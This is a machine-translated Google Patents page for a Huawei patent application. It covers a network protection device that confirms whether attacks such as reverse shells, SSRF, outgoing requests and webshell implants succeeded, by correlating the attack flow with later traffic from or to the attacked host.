WO2022156197A1 - 攻击成功识别方法及防护设备 - Google Patents

攻击成功识别方法及防护设备 Download PDF

Info

Publication number
WO2022156197A1
WO2022156197A1 PCT/CN2021/112867 CN2021112867W WO2022156197A1 WO 2022156197 A1 WO2022156197 A1 WO 2022156197A1 CN 2021112867 W CN2021112867 W CN 2021112867W WO 2022156197 A1 WO2022156197 A1 WO 2022156197A1
Authority
WO
WIPO (PCT)
Prior art keywords
attack
data stream
host
data
attacked
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Ceased
Application number
PCT/CN2021/112867
Other languages
English (en)
French (fr)
Inventor
张钊
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Huawei Technologies Co Ltd
Original Assignee
Huawei Technologies Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Huawei Technologies Co Ltd filed Critical Huawei Technologies Co Ltd
Priority to EP21920577.0A priority Critical patent/EP4270907A4/en
Publication of WO2022156197A1 publication Critical patent/WO2022156197A1/zh
Priority to US18/355,576 priority patent/US20230370482A1/en
Anticipated expiration legal-status Critical
Ceased legal-status Critical Current

Links

Images

Classifications

    • H—ELECTRICITY
    • H04—ELECTRIC COMMUNICATION TECHNIQUE
    • H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00—Network architectures or network communication protocols for network security
    • H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416—Event detection, e.g. attack signature detection
    • H—ELECTRICITY
    • H04—ELECTRIC COMMUNICATION TECHNIQUE
    • H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00—Network architectures or network communication protocols for network security
    • H04L63/02—Network architectures or network communication protocols for network security for separating internal from external traffic, e.g. firewalls
    • H—ELECTRICITY
    • H04—ELECTRIC COMMUNICATION TECHNIQUE
    • H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00—Network architectures or network communication protocols for network security
    • H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441—Countermeasures against malicious traffic
    • H—ELECTRICITY
    • H04—ELECTRIC COMMUNICATION TECHNIQUE
    • H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00—Network architectures or network communication protocols for network security
    • H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441—Countermeasures against malicious traffic
    • H04L63/145—Countermeasures against malicious traffic the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms
    • H—ELECTRICITY
    • H04—ELECTRIC COMMUNICATION TECHNIQUE
    • H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00—Network architectures or network communication protocols for network security
    • H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441—Countermeasures against malicious traffic
    • H04L63/1458—Denial of Service
    • H—ELECTRICITY
    • H04—ELECTRIC COMMUNICATION TECHNIQUE
    • H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L9/00—Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
    • H04L9/40—Network security protocols

Definitions

  • the present application relates to the field of network technologies, and in particular, to a method for successfully identifying an attack and a protection device.
  • the related art uses the response content of the server to determine whether the attack is successful.
  • the protection device performs attack detection on packets in a data stream transmitted between communication peers based on the signature database. If the protection device detects an attack event, the protection device extracts attack data from the payload of the packet generating the attack event, and determines an expected result after the attack data is executed by the server. After that, the protection device further determines whether the response message from the server in the data flow actually contains the expected result. If the response message from the server in the above data stream contains the above expected result, it is determined that the attack is successful. If the response message from the server in the above data stream does not contain the above expected result, it is determined that the attack fails.
  • the above method can only judge whether the attack is successful for the type of attack with echo (that is, the execution result of the attack data included in the response content), so the applicable scenarios are limited, and the successful attack cannot be effectively identified from the massive attack alarms. event.
  • the embodiments of the present application provide a method for identifying a successful attack and a protection device, which can more effectively identify an attack event that is successfully executed.
  • the technical solution is as follows:
  • a method for successfully identifying an attack is provided.
  • an attack is detected on a first data stream; if an attack event is detected in the first data stream, the attack is extracted from the payload content of the first data stream. data; obtain the identifier of the attacked host from the header of the first data stream; obtain the second data stream, the second data stream is the data stream transmitted after the attack event in the first data stream occurs; according to the attack data and the attacked.
  • the identifier of the host is used to detect whether the second data stream and the first data stream satisfy the association condition; if the second data stream and the first data stream satisfy the association condition, it is determined that the attack event is an attack event that is successfully executed.
  • the above provides a method for determining whether the attack is successful by using the mechanism of multi-stream association.
  • the detection By obtaining attack data and the identifier of the attacked host from the data stream in which the attack event is detected, using the attack data and the identifier of the attacked host, the detection
  • the data stream to the attack event is associated with other data streams after the data stream, and whether the attack is successful is determined according to whether it is associated with other data streams.
  • the method can solve the problem of how to determine the success of the attack in the scenario where the server has no response or the execution result of the attack data is not included in the response content. attack event.
  • the transmission time interval between the second data stream and the first data stream is less than or equal to a time window.
  • the identifier of the attacked host is determined according to the destination address information of the responder of the first data stream, the attacked host is located in a local area network, and the first data stream is an attack host located in the Internet to the above-mentioned Initiated by the attacked host.
  • Correlating the data flow within the time window after the attack detection data flow helps to improve the identification success rate while taking into account the performance overhead.
  • the aforementioned attack data includes an identification of the specified object.
  • the designated object is a designated host, and the identifier of the designated object is the address of the designated host; or, the designated object is a designated file saved on the attacked host, and the identifier of the designated object is the designated file. or, the designated object is a designated resource, and the identifier of the designated resource is the locator of the designated resource; or, the designated object is a designated port, and the identifier of the designated object is the port number of the designated port.
  • the above-mentioned attack event includes a bounce shell (shell) attack
  • the above-mentioned designated host is the control terminal of the bounced shell
  • the address of the designated host in the attack data is the address of the control terminal of the bounced shell
  • the above-mentioned bounced shell attack is the above-mentioned attacker.
  • the attack is initiated by the attacking host sending a request to the above-mentioned control terminal.
  • the address of the control terminal of the rebound shell in the attack data includes the Internet Protocol (IP) address of the control terminal, or a combination of the IP address and port number of the control terminal.
  • IP Internet Protocol
  • IP address and port number association of the control end of the rebound shell helps to more accurately associate the attack traffic of the control end in the massive traffic, thereby improving the accuracy of successful attack identification.
  • the identifier of the attacked host includes the IP address of the attacked host, and the second data stream and the first data stream satisfy the above association conditions, including: the initiator of the second data stream IP IP address The address includes the IP address of the attacked host, and the address of the responder of the second data stream is the address of the control end of the rebound shell.
  • the attack event includes an outgoing request attack
  • the attack data includes a locator of a resource on a designated host in the Internet
  • the outgoing request attack is initiated by the attacked host requesting a resource on the designated host in the Internet. attack.
  • the above-mentioned second data flow and the above-mentioned first data flow satisfy the above-mentioned association conditions, including: the IP address of the initiator of the above-mentioned second data flow includes the IP address of the above-mentioned attacked host, and the above-mentioned second data flow It includes the locator of the resource on the designated host in the Internet, and the protocol on which the second data stream is based is the protocol used by the payload of the first data stream.
  • IP address of the attacked host and the locator of the resource helps to improve the accuracy of multi-flow association, thereby improving the accuracy of successful attack identification.
  • the above-mentioned attack event includes a server-side request forgery (Server-Side Request Forgery, SSRF) attack
  • the above-mentioned attack data includes a locator of a resource on a designated host in a local area network
  • the above-mentioned SSRF attack is that the above-mentioned attacked host requests the above-mentioned local area network. The attack initiated by the resource on the specified host in .
  • the identifier of the attacked host includes the IP address of the attacked host, and the second data stream and the first data stream satisfy the above association conditions, including: the initiator IP address of the second data stream includes: The IP address of the attacked host, and the second data stream includes the locator of the resource on the designated host in the local area network, and the protocol based on the second data stream is the protocol used by the payload of the first data stream.
  • IP address of the attacked host and the locator of the resource helps to improve the accuracy of multi-flow association, thereby improving the accuracy of successful attack identification.
  • the above-mentioned attack event includes a file implantation attack
  • the above-mentioned designated file is a Trojan horse file
  • the identifier of the above-mentioned designated file in the above-mentioned attack data is the file name of the Trojan horse file on the attacked host
  • the above-mentioned file implantation attack The attack launched by the above-mentioned attacked host implanting a Trojan file.
  • the identifier of the attacked host includes the IP address of the attacked host, and the second data stream and the first data stream satisfy the above association conditions, including: the responder address of the second data stream includes the above The IP address of the attacked host, and the second data stream includes a successful request for accessing the Trojan file.
  • the above-mentioned Trojan horse file includes a web page Trojan horse (Webshell) file.
  • Webshell web page Trojan horse
  • a protective device in a second aspect, includes a memory, a network interface, and at least one processor, where the memory is used to store program codes, and after the program codes are read by the at least one processor, the protective device executes the above-mentioned first step.
  • the protective device includes a memory, a network interface, and at least one processor, where the memory is used to store program codes, and after the program codes are read by the at least one processor, the protective device executes the above-mentioned first step.
  • a protection system in a third aspect, includes a memory, a network interface and at least one processor.
  • the memory, network interface and at least one processor in the protection system are distributed over different physical computers.
  • the memory is used to store program codes. After the program codes are read by at least one processor, the protection system executes the method in the first aspect or any optional manner of the first aspect. For details, refer to the detailed description above. It is not repeated here.
  • a device for identifying a successful attack has the function of implementing the method described in the first aspect or any optional manner of the first aspect.
  • the functions can be implemented by hardware, and can also be implemented by hardware executing corresponding software.
  • the hardware or software includes one or more units corresponding to the above functions.
  • a fifth aspect provides a computer-readable storage medium, where at least one instruction is stored in the storage medium, and when the instruction is executed on a computer, causes the computer to execute the above-mentioned first aspect or any optional manner of the first aspect. provided method.
  • a computer program product in a sixth aspect, includes one or more computer program instructions, when the computer program instructions are loaded and executed by a computer, the computer is caused to perform the first aspect or the first aspect.
  • a chip including a memory and a processor, the memory is used for storing computer instructions, and the processor is used for calling and running the computer instructions from the memory to execute the above-mentioned first aspect and any possible possible aspects of the first aspect. method in the implementation.
  • FIG. 1 is a schematic diagram of a typical application scenario provided by an embodiment of the present application.
  • FIG. 2 is a flowchart of a method for successfully identifying an attack provided by an embodiment of the present application
  • FIG. 3 is a flowchart of a method for successfully identifying an attack provided by an embodiment of the present application
  • FIG. 4 is a flowchart of a method for successfully identifying an attack provided by an embodiment of the present application
  • FIG. 5 is a flowchart of a method for successfully identifying an attack provided by an embodiment of the present application
  • FIG. 6 is a flowchart of a method for successfully identifying an attack provided by an embodiment of the present application
  • FIG. 7 is a flowchart of a method for successfully identifying an attack provided by an embodiment of the present application.
  • FIG. 8 is a schematic structural diagram of a protective device provided by an embodiment of the present application.
  • FIG. 9 is a schematic structural diagram of an apparatus for identifying a successful attack provided by an embodiment of the present application.
  • the application scenarios of the embodiments of the present application include, but are not limited to, Reverse Shell (Reverse Shell, a program used to execute operating system instructions), outgoing requests, and Server-Side Request Forgery , SSRF), Trojans (such as web Trojans webshell), intranet port and service scanning, the theft of intranet sensitive data, command injection, worms, zombies and other types of network attacks to identify successful attacks.
  • Reverse Shell Reverse Shell
  • SSRF Server-Side Request Forgery
  • Trojans such as web Trojans webshell
  • intranet port and service scanning the theft of intranet sensitive data, command injection, worms, zombies and other types of network attacks to identify successful attacks.
  • the protection device in the embodiment of the present application is a device used for network security protection.
  • the protective device can detect and defend against network attacks and viruses, etc., to ensure the safe transmission of data.
  • the protection device is deployed between the local area network and the Internet, and detects the data flow in and out of the local area network to confirm whether there is an attack on the local area network, thereby protecting the network security of the local area network.
  • Protection devices include but are not limited to firewalls, security gateways (such as routers or switches), intrusion detection system (IDS) devices, intrusion prevention system (IPS) devices, unified threat management (unified threat management) , UTM) equipment, anti-virus (anti-virus, AV) equipment, anti-distributed denial-of-service attack (distributed denial-of-service attack, DDoS) (anti-DDoS) equipment, next generation firewall (Next generation firewall, NGFW) One or more of the integrations.
  • IDS intrusion detection system
  • IPS intrusion prevention system
  • UTM anti-virus
  • anti-virus anti-virus
  • AV anti-distributed denial-of-service attack
  • DDoS anti-DDoS
  • next generation firewall Next generation firewall
  • a data flow is a packet flow including bidirectional data.
  • a data flow includes packets sent by A to B and packets sent by B to A.
  • a data stream includes, for example, all messages in a specific transport connection or media stream.
  • the related art can only realize the successful attack determination in the scenario where the response content of the server includes the execution result of the attack data. In the scenario where there is no echo or the execution result of the attack data is not included in the response content, it is impossible to determine whether the attack is successful, so the applicable scenarios are limited.
  • the embodiment of the present application provides a method for identifying a successful attack based on the idea of multi-stream association, which can solve the problem of how to attack a scenario where there is no response from the server or the execution result of the attack data is not included in the response content. Successfully determined question.
  • FIG. 1 is a schematic diagram of a typical application scenario provided by an embodiment of the present application.
  • FIG. 1 shows a deployment scenario of network security protection for an enterprise network.
  • the system architecture shown in FIG. 1 includes the Internet, an enterprise network, and firewalls, probes, and security analysis devices deployed between the enterprise network and the Internet.
  • the Internet includes at least one server and at least one terminal (FIG. 1 takes one server and one terminal as an example for illustration). In addition, there may be attackers in the Internet.
  • the enterprise network includes at least one server and at least one terminal.
  • Firewalls, probes, and security analysis devices all belong to the protection devices in the embodiments of the present application. Firewalls, probes, and security analysis devices are all deployed between the corporate network and the Internet.
  • the firewall is deployed at the egress of the enterprise network through direct connection. It is used to filter the data flow in and out of the enterprise network, manage the access behavior in and out of the enterprise network, and detect and alarm network attacks. Firewalls are mainly used to defend against external attacks and protect corporate networks.
  • Probes and security analysis devices are deployed in the network through bypass.
  • the probe is used to collect the data flow in and out of the enterprise network, and upload the data flow to the security analysis device.
  • the security analysis device is used to analyze and detect the data stream collected by the probe.
  • the firewall, probe or security analysis device can accurately determine whether the attack is successful by executing the method provided in the following embodiment.
  • the specific method flow please refer to Introduction below.
  • the enterprise network in FIG. 1 can be replaced by other types of local area networks, such as campus networks.
  • the attacker is located on the Internet in Fig. 1.
  • the attacker is located in the corporate network and the victim is located in the Internet.
  • FIG. 2 is a flowchart of a method 200 for successfully identifying an attack provided by an embodiment of the present application.
  • the method 200 includes the following steps S201 to S206.
  • the network deployment scenario on which the method 200 is based is as shown in FIG. 1 above.
  • the protective device in the method 200 is, for example, the firewall, the probe or the security analysis device in FIG. 1; or, the protective device in the method 200 is the firewall, the probe and the security analysis device in FIG. 1.
  • a device in which two or more devices are integrated (such as a cluster computer).
  • the attacking host in the method 200 is, for example, the host used by the attacker in the Internet in FIG. 1 .
  • the attacked host in the method 200 is, for example, the enterprise network in FIG. 1 , for example, the attacked host is a server or a terminal in the enterprise network.
  • Method 200 involves the processing of multiple data streams.
  • first data stream and second data stream are used to distinguish and describe multiple different data streams.
  • Step S201 the protection device performs attack detection on the first data stream.
  • the first data stream is a data stream sent by the attacking host to the attacked host.
  • the initiator of the first data stream is the attacking host
  • the responder of the first data stream is the attacked host.
  • the initiator of the data stream refers to the party that triggers the connection (or session) establishment process by sending a request or the like.
  • the initiator is the sending synchronization (synchronize, SYN) message to trigger the communication party of the TCP connection establishment process.
  • the responder of the data stream refers to the communication party that establishes a connection with the initiator according to the request of the initiator.
  • Step S202 If an attack event is detected in the first data stream, the protection device extracts attack data from the payload content of the first data stream.
  • Attack events include but are not limited to bounce shell attacks, outgoing request attacks, SSRF attacks, and file implantation attacks.
  • Attack data is used to instruct the attacked host to perform specified actions.
  • the attacking host sends the attack data to the attacked host, thereby triggering the attacked host to perform the specified behavior, thereby realizing the attack purpose.
  • attack data includes, but is not limited to, a piece of malicious code, one or a group of malicious commands, a script file, one or a group of Structured Query Language (SQL) statements, an identifier of one or a group of high-risk functions, This embodiment does not limit the form of the attack data.
  • SQL Structured Query Language
  • the behavior specified by the attack data includes many types. The following describes the attack data in combination with several specific behaviors. Please refer to the following (1) to (2).
  • the attack data indicates that the attacked host accesses the specified object.
  • the type of the specified object includes but is not limited to the host, resource or port, etc.
  • the following describes the content and meaning of the attack data in combination with the specific type of the specified object.
  • the designated object is the designated host.
  • the designated host is the control side.
  • the specified host is the host that acts as the control end of the rebound shell, and the attacking host realizes the attack purpose by controlling the attacked host to connect to the specified host.
  • the control terminal and the attacking host are two different hosts. That is to say, the attack scenario involves the process of three-party interaction between the attacking host, the attacked host, and the control terminal.
  • the attack scenario involves the process of three-party interaction between the attacking host, the attacked host, and the control terminal.
  • the target of the attack is to let host B connect to host C.
  • host A is the attacking host
  • host B is the attacked host
  • host C is the designated host mentioned in this embodiment.
  • the control terminal and the attacking host are the same host. For example, in order to improve the attack efficiency, the attacker uses the same host to initiate an attack and act as the control terminal.
  • the designated host is a host in the network where the attacked host is located.
  • the attacked host is located.
  • the designated host is a host in the network where the attacked host is located.
  • the designated host is an Office Automation (OA) system within the enterprise or other host that cannot be accessed from the external network.
  • the attacking host uses the attacked host as a springboard to access the designated host to achieve the purpose of the attack.
  • a possible implementation of specifying the specified host is that the attack data in the payload content includes the identifier of the specified host.
  • the attack data indicates that the attacked host sends a connection request or a data transmission request to the designated host corresponding to the identifier.
  • the data form of the identifier of the designated host in the attack data includes many situations.
  • the identifier of the specified host in the attack data is the address of the specified host, or the combination of the address and port number of the specified host, or the domain name of the specified host. Specifies the address of the host such as an IP address or a media access control (MAC) address.
  • MAC media access control
  • the designated object is the designated resource.
  • Malicious files include, but are not limited to, viruses, Trojan horses, and the like.
  • the attack data indicates that the attacked host requests to obtain a malicious file, thereby using the execution of the malicious file to control the attacked host.
  • the attack data instructs the attacked host to transmit the confidential data in the local area network to the designated address in the Internet, so as to use the attacked host to steal the confidential data.
  • the attack data includes an identification of the specified resource.
  • the attack data indicates that the attacked host requests the specified resource corresponding to the identifier.
  • the data form of the identification of the specified resource in the attack data includes many cases.
  • the identifier of the specified resource in the attack data is the locator of the specified resource.
  • the locator of the specified resource is the Uniform Resource Locator (URL).
  • a URL is a string of long or short strings.
  • the attacking host sends the URL of the malicious file It is sent to the attacked host. If the attack is successful, the attacked host will subsequently send an HTTP request containing the URL of the malicious file to download the malicious file locally.
  • the identifier of the specified resource in the attack data is the name or storage path of the specified resource.
  • FTP File Transfer Protocol
  • the attacking host sends the file path of the malicious file to the attacked host. If the attack is successful, the attacked host sends the file as an FTP client. An FTP request containing the file path downloads the malicious file locally.
  • the specified object is the specified port.
  • the attack data indicates that the attacked host scans whether the specified port in the intranet is open, so as to prepare for subsequent further intrusions.
  • the attack data includes the port number of the specified port. The attack data instructs the attacked host to perform a port scan to the designated port identified by the port number.
  • the above (1-1) to (1-3) briefly introduce several situations that the attack data may have from the perspective of the object type specified in the attack data. From the perspective of the network deployment location in the attack scenario, the attack data may also have various situations, which are illustrated by (1-a) to (1-b) below.
  • the specified object is located in the Internet.
  • the attack data indicates that the attacked host sends a connection request or a data transfer request to a specified host in the Internet.
  • the attack data includes the address of the specified host in the Internet (also called the public network address or the external network address).
  • the attack data indicates that the attacked host requests a specified resource in the Internet.
  • Attack data includes the locator of a given resource on the Internet.
  • the specified object is located in the local area network.
  • the attack data indicates that the attacked host requests a specified resource on a specified host in the local area network.
  • the attack data includes the locator of the specified resource in the local area network.
  • the attack data indicates that the attacked host sends a connection request or a data transmission request to a designated host in the local area network.
  • the attack data includes the address of the specified host in the local area network (also called the intranet address).
  • the attack data indicates that the attacked host performs port scanning on a designated port in the local area network.
  • the attack data instructs the attacked host to create a specified file.
  • the specified files include but are not limited to Trojan horse files or virus files.
  • the Trojan file is, for example, a web Trojan (Webshell) file.
  • the attack data includes an identification of the specified file.
  • the identifier of the specified file in the attack data includes but is not limited to the file name, file path, URL, etc. of the specified file.
  • the attack data in the payload content is the creation command of the Trojan file
  • the creation command includes the file name.
  • the attacking host instructs the attacked host to create and save the Trojan horse file corresponding to the file name by sending the creation command of the Trojan file to the attacked host.
  • Step S203 the protection device obtains the identifier of the attacked host from the packet header of the first data stream.
  • the identifier of the attacked host includes the IP address of the attacked host, or a combination of the IP address and port number of the attacked host.
  • the identity of the attacked host is determined according to the destination address information of the responder of the first data flow.
  • the destination address information includes the destination IP address, or a combination of the destination IP address and the destination port number.
  • the above-mentioned packet header includes an IP header and a transport layer protocol header (such as a TCP header or a UDP header), and the IP address of the attacked host is obtained from the Destination Address (DA) field in the IP header of the first data stream.
  • DA Destination Address
  • the obtained port number of the attacked host is obtained from the destination port field in the transport layer protocol header in the first data stream.
  • Step S204 the protection device acquires the second data stream.
  • the second data stream and the first data stream are two different data streams.
  • the second data stream is a data stream transmitted after the attack event in the first data stream occurs.
  • a typical scenario is that the second data stream and the first data stream belong to two different sessions.
  • the session here contains the packets transmitted between the establishment of a connection and the disconnection of the connection.
  • connection 1 is established between the attacking host and the attacked host, and then the attacking host sends a data stream (that is, the first data stream mentioned in this article) to the attacked host through connection 1.
  • the attack is successful, the attacked host B actively connects to the host designated by the attacking host A to establish connection 2, or the attacking host A reconnects to the attacked host B to establish connection 3.
  • the second data stream is, for example, the data stream transmitted in connection 2 or connection 3, or a request to attempt to establish connection 2 or connection 3.
  • the attack event occurring in the first data stream is the same as the attack event detected by the protection device, or there is a slight difference between the attack event occurring in the first data stream and the attack event detected by the protection device.
  • the transmission time of the second data stream is later than the transmission time of the first data stream.
  • the timestamp in the second data stream is later than the timestamp in the first data stream.
  • the transmission time interval between the second data stream and the first data stream is less than or less than or equal to a time window.
  • the transmission time point of the first data stream is t1
  • the time window is T
  • the second data stream is the data stream transmitted within the time range of [t1, t1+T].
  • the time window is a minute-level window.
  • the above-mentioned time window includes various determination methods.
  • the time window is preset by the network administrator. For example, network administrators configure time windows for protection devices through the command line interface and web interface.
  • the time window is automatically learned by the protective device using a machine learning algorithm. For example, the protection device uses known malicious traffic, behavior logs of the attacked host, etc. as samples to train a machine learning model, and then the protection device inputs the transmission time of the first data stream into the trained machine learning model. Output time window.
  • Step S205 the protection device detects whether the second data stream and the first data stream satisfy the association condition according to the attack data and the identifier of the attacked host.
  • Association conditions are used to determine whether multiple data streams are related.
  • the association conditions include, but are not limited to, the association conditions of the host dimension, the association conditions of the attack data dimension, and the association conditions of the protocol dimension. The following is a detailed description of the association conditions of various dimensions.
  • the association condition of the host dimension is used to determine whether multiple data streams are associated with the same attacked host. Taking two data streams, the first data stream and the second data stream, as examples to describe, the second data stream and the first data stream satisfy the associated conditions of the host dimension, including but not limited to the following (A-1) or (A- 2).
  • the protection device obtains the identifier of the initiator of the second data stream from the packet header of the second data stream; the protection device determines whether the identifier of the initiator of the second data stream is the same as the identifier of the attacked host; if The identifier of the initiator of the second data stream is the same as the identifier of the attacked host, indicating that the initiator of the second data stream is the attacked host, and the protection device determines that the association condition of the host dimension is satisfied.
  • the identifier of the initiator of the second data stream includes an IP address, or a combination of an IP address and a port number.
  • the identity of the originator of the second data stream is determined according to source address information of the second data stream.
  • the packet header of the second data stream includes an IP header and a transport layer protocol header (such as a TCP header or a UDP header), and the IP address of the initiator of the second data stream is the source address from the IP header in the second data stream (Source Address, SA) field, the port number of the initiator is obtained from the source port field in the transport layer protocol header in the first data stream.
  • a transport layer protocol header such as a TCP header or a UDP header
  • the protection device obtains the identifier of the responder of the second data stream from the packet header of the second data stream; the protection device determines whether the identifier of the responder of the second data stream is the same as the identifier of the attacked host; if The identifier of the responder of the second data stream is the same as the identifier of the attacked host, indicating that the responder of the second data stream is the attacked host, and the protection device determines that the association condition of the host dimension is satisfied.
  • the identifier of the responder of the second data stream includes an IP address, or a combination of an IP address and a port number.
  • the identity of the responder of the second data stream is determined according to destination address information of the second data stream.
  • the packet header of the second data stream includes an IP header and a transport layer protocol header (such as a TCP header or a UDP header), and the IP address of the responder of the second data stream is the destination address from the IP header in the second data stream (DA) field, the port number of the respondent is obtained from the destination port field in the transport layer protocol header in the first data stream.
  • DA second data stream
  • the correlation condition of the attack data dimension is used to determine whether the behavior reflected in the subsequent data flow is associated with the attack data in the attack flow.
  • the association condition of the attack data dimension is used to determine whether the second data stream has the behavior specified by the attack data in the first data stream.
  • satisfying the association condition of the attack data dimension means that the second data stream includes a request for a specified object.
  • the request for the specified object includes an identification of the specified object in the attack data.
  • the specified object is the specified host, and the packet header corresponding to the request includes the address of the specified host, or a combination of the address of the specified host and the port number.
  • the specified object is a specified resource
  • the request is an HTTP request
  • the request line of the HTTP request includes the URL of the specified resource.
  • the requests mentioned here include, but are not limited to, connection establishment requests, data transmission requests, status detection requests, and the like.
  • the connection establishment request includes, but is not limited to, the three-way handshake request in TCP.
  • Data transmission requests include but are not limited to HTTP requests (such as get requests or post requests), FTP requests (such as file upload requests or file download requests), and the like.
  • satisfying the correlation condition of the attack data dimension means that the second data stream includes the request sent by the attacked host to the designated host, and the designated host includes It is not limited to the control terminal, the attacker or other hosts other than the attacked host in the intranet.
  • satisfying the correlation condition of the attack data dimension means that the second data stream includes an acquisition request by the attacked host for a specified resource, where the specified resource includes but is not limited to malicious files, confidential data, and the like.
  • satisfying the correlation condition of the attack data dimension means that the second data stream includes a status detection request (or a port scan request) of the attacked host for a designated port in the intranet.
  • satisfying the correlation condition of the attack data dimension means that the second data stream includes a successful access request for the specified file sent to the attacked host.
  • the association condition of the protocol dimension is used to determine whether the protocol based on the subsequent data flow is associated with the attack traffic. Taking two data streams, the first data stream and the second data stream, as examples to describe, the second data stream and the first data stream satisfy the association conditions of the protocol dimension, including but not limited to the following (C-1) or (C- 2).
  • the protocol on which the second data stream is based is the protocol used by the payload of the first data stream.
  • the protocol used by the payload of the first data stream includes but is not limited to HTTP, HTTPS, Domain Name System (Domain Name System, DNS), Remote Method Invocation (Remote Method Invocation, RMI), Lightweight Directory Access Protocol (Lightweight Directory Access Protocol, LDAP) Wait.
  • the protocol used by the payload of the first data stream is the HTTP protocol. If the second data stream is an HTTP stream, then the second data stream and the first data stream satisfy the association conditions of the protocol dimension; if the second data stream is a DNS stream, then the second data stream and the first data stream do not satisfy the protocol dimension. Association conditions.
  • the protocol on which the second data stream is based is the protocol corresponding to the attack type in the first data stream.
  • the attack event in the first data stream belongs to attack type A.
  • a typical scenario of attack type A is to use the communication interaction mechanism provided by protocol A to attack. If the protocol on which the second data stream is based is protocol A, then the second data stream and the first data stream satisfies the association condition of the protocol dimension.
  • the attack event in the first data stream is a bounce shell attack.
  • a typical scenario of a bounce shell attack is that the attacked host initiates a TCP connection request to the bounce shell controller. If the protocol based on the second data stream is a TCP stream , then the second data stream and the first data stream satisfy the association condition of the protocol dimension.
  • TCP as the association condition of the protocol dimension in the bounce shell attack scenario is only an example, and this embodiment does not limit which protocol is used as the association condition in the bounce shell attack scenario.
  • the protection device stores a look-up table, and the look-up table stores at least one set of correspondences between attack types and protocol types. After the protection device detects the attack event in the first data stream, the protection device uses the attack type to which the attack event belongs as a query index, and obtains the protocol type corresponding to the attack type from the query table. The protection device uses the protocol type corresponding to the queried attack type to detect whether the second data stream and the first data stream satisfy the association condition of the protocol dimension.
  • association conditions from the host dimension, the attack data dimension, and the protocol dimension. Since the association conditions of various dimensions are set for multi-streams, the association between multi-streams can be found more accurately, which helps to realize multi-stream association identification in a more refined manner, thereby improving the accuracy of successful identification of attacks.
  • association conditions of the above-mentioned various dimensions can optionally be combined in any manner.
  • the association conditions of different dimensions are optionally combined in the logical relationship of "and”, or alternatively, they are combined in the logical relationship of "or”, and the matching sequence (or priority) of the association conditions of different dimensions is optional. Determined according to the scene or configuration.
  • association conditions listed above are exemplary, and the present embodiment does not limit the specific association conditions.
  • Step S206 If the second data stream and the first data stream satisfy the association condition, the protection device determines that the attack event is an attack event that is successfully executed.
  • the above provides a method for determining whether the attack is successful by using the mechanism of multi-stream association.
  • the detection By obtaining attack data and the identifier of the attacked host from the data stream in which the attack event is detected, using the attack data and the identifier of the attacked host, the detection
  • the data stream to the attack event is associated with other data streams after the data stream, and whether the attack is successful is determined according to whether it is associated with other data streams.
  • the method can solve the problem of how to determine the success of the attack in the scenario where the server has no response or the execution result of the attack data is not included in the response content. attack event.
  • the above describes the overall process of successful attack identification.
  • the following is an example of how to associate two streams with four attack scenarios.
  • a bounce shell attack is an attack initiated by the attacked host sending a request (such as a connection request or a data transfer request) to the control end of the bounce shell.
  • the basic principle of a bounce shell attack is that the attacking host sends a bounce shell attack packet to the attacked host, and the payload of the bounce shell attack packet includes the address of the control end of the bounce shell. If the attack is successful, after receiving the bounce shell attack packet, the attacked host will actively send a connection request to the control terminal corresponding to the address in the attack packet, thereby establishing a connection with the control terminal. After that, the attacked host receives the command from the control terminal through the connection; the attacked host executes the command of the control terminal, and returns the output result of the command to the control terminal through the connection.
  • control side of the reverse shell and the attacking host are played by different or the same host respectively.
  • control side of the bounce shell and the attacking host are two different hosts.
  • control side of the rebound shell is equivalent to a third-party host relative to the attacking host and the attacked host.
  • the initiator of the bounce shell attack packet is different from the responder of the request sent by the attacked host when the bounce shell attack is executed successfully.
  • the control side of the bounce shell and the attacking host are the same host. In this case, the initiator of the bounce shell attack packet is the same as the responder of the request sent by the attacked host when the bounce shell attack is executed successfully.
  • the first data stream includes a rebound shell attack packet
  • the rebound shell attack packet includes the address of the control end of the rebound shell, and the address of the control end. It includes the IP address of the control terminal, or the combination of the IP address and port number of the control terminal.
  • the data stream transmitted after the rebound shell attack event will contain the following characteristics: the initiator of the data stream is the attacked host, and the responder of the data stream is the control end of the rebound shell.
  • the data stream contains the connection request from the attacked host, or the output result obtained by the attacked host executing the command of the control terminal.
  • the protective device can correlate with the data flow with the above-mentioned characteristics (ie, the second data flow in the method 200), so as to determine that the rebound shell attack is successful.
  • the protection device implements the association between two data streams according to the address of the attacked host and the address of the control end of the bounce shell.
  • the protection device also uses TCP as an association condition, and specifically associates the TCP stream transmitted after the attack event occurs.
  • the protection device obtains the address of the attacked host and the address of the control end of the rebound shell from the attack data included in the payload content of the first data stream. If the address of the initiator of the second data stream includes the address of the attacked host, and the address of the responder of the second data stream is the address of the control end of the bounce shell, in this case, the second data stream and the first data stream satisfy the association condition, the protection device will determine the rebound shell attack event as a successful attack event.
  • the address of the attacked host is, for example, the IP address of the attacked host.
  • the second data stream is a TCP stream.
  • An outgoing request attack is an attack initiated by the attacked host requesting resources on a specified host in the Internet.
